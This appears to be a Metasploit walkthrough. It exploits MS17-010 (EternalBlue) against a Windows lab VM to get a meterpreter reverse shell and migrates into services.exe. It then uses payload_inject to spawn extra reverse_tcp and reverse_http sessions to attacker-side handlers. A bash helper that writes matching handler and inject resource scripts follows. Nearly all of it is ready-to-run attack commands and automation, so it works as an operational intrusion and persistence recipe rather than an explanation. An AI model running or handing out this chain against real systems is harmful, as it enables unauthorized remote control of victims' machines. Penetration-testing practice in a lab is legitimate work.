First, take the target with ms17_010 (EternalBlue). 192.168.50.146 is the victim VM, 192.168.50.130 is the Kali IP. Select the module before setting its options, since set applies to the currently loaded module:
- use exploit/windows/smb/ms17_010_eternalblue
- set rhost 192.168.50.146
- set rport 445
- set payload windows/x64/meterpreter/reverse_tcp
- set lhost 192.168.50.130
- set lport 5577
- set autorunscript post/windows/manage/migrate name=services.exe
- exploit -j -z
Next, in a second msfconsole, start a listener on 3333:
handler -H 192.168.50.130 -P 3333 -p windows/meterpreter/reverse_tcp
Then, in the console that owns the meterpreter session from above:
- use exploit/windows/local/payload_inject
- set payload windows/meterpreter/reverse_tcp
- set lhost 192.168.50.130
- set lport 3333
- set DisablePayloadHandler True
- set PrependMigrate True
- set session 1
- run
Once the new session checks in on 3333, the session obtained through ms17_010 can be closed. The payload and port given to payload_inject must match the handler exactly (windows/meterpreter/reverse_tcp on 3333 here): with DisablePayloadHandler True this console starts no handler of its own, so a mismatch simply ends the run with no new session.
The above uses reverse_tcp; reverse_http works the same way:
In a second msfconsole, start a listener on 18080 (the lport used below):
- use exploit/multi/handler
- set payload windows/meterpreter/reverse_http
- set lhost 192.168.50.130
- set lport 18080
- set ExitOnSession false
- set SessionExpirationTimeout 0
- set SessionCommunicationTimeout 0
- exploit -j -z
Then spawn the new session from the old one:
- use exploit/windows/local/payload_inject
- set payload windows/meterpreter/reverse_http
- set lhost 192.168.50.130
- set lport 18080
- set DisablePayloadHandler True
- set PrependMigrate True
- set session 1
- run
After run it takes roughly 15 to 20 seconds for the new session to be fully established.
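The two handler/inject pairs above (reverse_tcp on 3333, reverse_http on 18080) as a small bash helper, added here as an example and not taken from the original post: it writes both msfconsole resource scripts from one set of parameters and refuses to write them when payload, LHOST or LPORT differ between the listener side and the payload_inject side, which is the mismatch that otherwise shows up only as "run finished, no session". The file names handler.rc and inject.rc, the demo argument and the helper names are this example's own choices; the only thing assumed about Metasploit is that msfconsole -r and the resource command load such files.

```shell
#!/usr/bin/env bash
# Added example, not code from the original post. Generates the two
# resource scripts used in the walkthrough and checks they agree before
# anything is launched. Assumed: file names handler.rc / inject.rc and
# the "demo" argument are arbitrary choices of this example.
set -u

# Resource script for a long-lived multi/handler.
# $1 = payload   $2 = LHOST   $3 = LPORT
gen_handler_rc() {
  local payload=$1 lhost=$2 lport=$3
  cat <<EOF
use exploit/multi/handler
set payload $payload
set LHOST $lhost
set LPORT $lport
set ExitOnSession false
EOF
  # reverse_http(s) sessions are governed by timeouts; zero them so an idle
  # session is not dropped. The TCP stager has no such options, so skip them.
  case "$payload" in
    *reverse_http*)
      printf 'set SessionExpirationTimeout 0\nset SessionCommunicationTimeout 0\n' ;;
  esac
  printf 'exploit -j -z\n'
}

# Resource script that spawns a fresh session from an existing one.
# $1 = payload   $2 = LHOST   $3 = LPORT   $4 = existing session id
gen_inject_rc() {
  local payload=$1 lhost=$2 lport=$3 session=$4
  cat <<EOF
use exploit/windows/local/payload_inject
set payload $payload
set LHOST $lhost
set LPORT $lport
set DisablePayloadHandler true
set PrependMigrate true
set SESSION $session
run
EOF
}

# Extract the value of "set KEY value" from an rc body (case-insensitive key).
rc_get() {
  printf '%s\n' "$1" | awk -v k="$2" 'tolower($1)=="set" && tolower($2)==tolower(k) {print $3}'
}

# 0 when handler and inject scripts agree on payload, LHOST and LPORT; 1 otherwise.
# DisablePayloadHandler means the injecting console never catches the callback
# itself, so any disagreement here silently yields no session.
check_pair() {
  local handler=$1 inject=$2 key
  for key in payload LHOST LPORT; do
    [ "$(rc_get "$handler" "$key")" = "$(rc_get "$inject" "$key")" ] || return 1
  done
  return 0
}

if [ "${1:-}" = "demo" ]; then
  h=$(gen_handler_rc windows/meterpreter/reverse_http 192.168.50.130 18080)
  i=$(gen_inject_rc  windows/meterpreter/reverse_http 192.168.50.130 18080 1)
  if check_pair "$h" "$i"; then
    printf '%s\n' "$h" > handler.rc
    printf '%s\n' "$i" > inject.rc
    echo "listener console:  msfconsole -q -r handler.rc"
    echo "console with session 1:  resource inject.rc"
  else
    echo "handler/inject mismatch, nothing written" >&2
    exit 1
  fi
fi
```

Run it with demo, then load handler.rc in the listener console and inject.rc in the console that owns session 1; change the three parameters in the demo block to get the reverse_tcp/3333 pair instead.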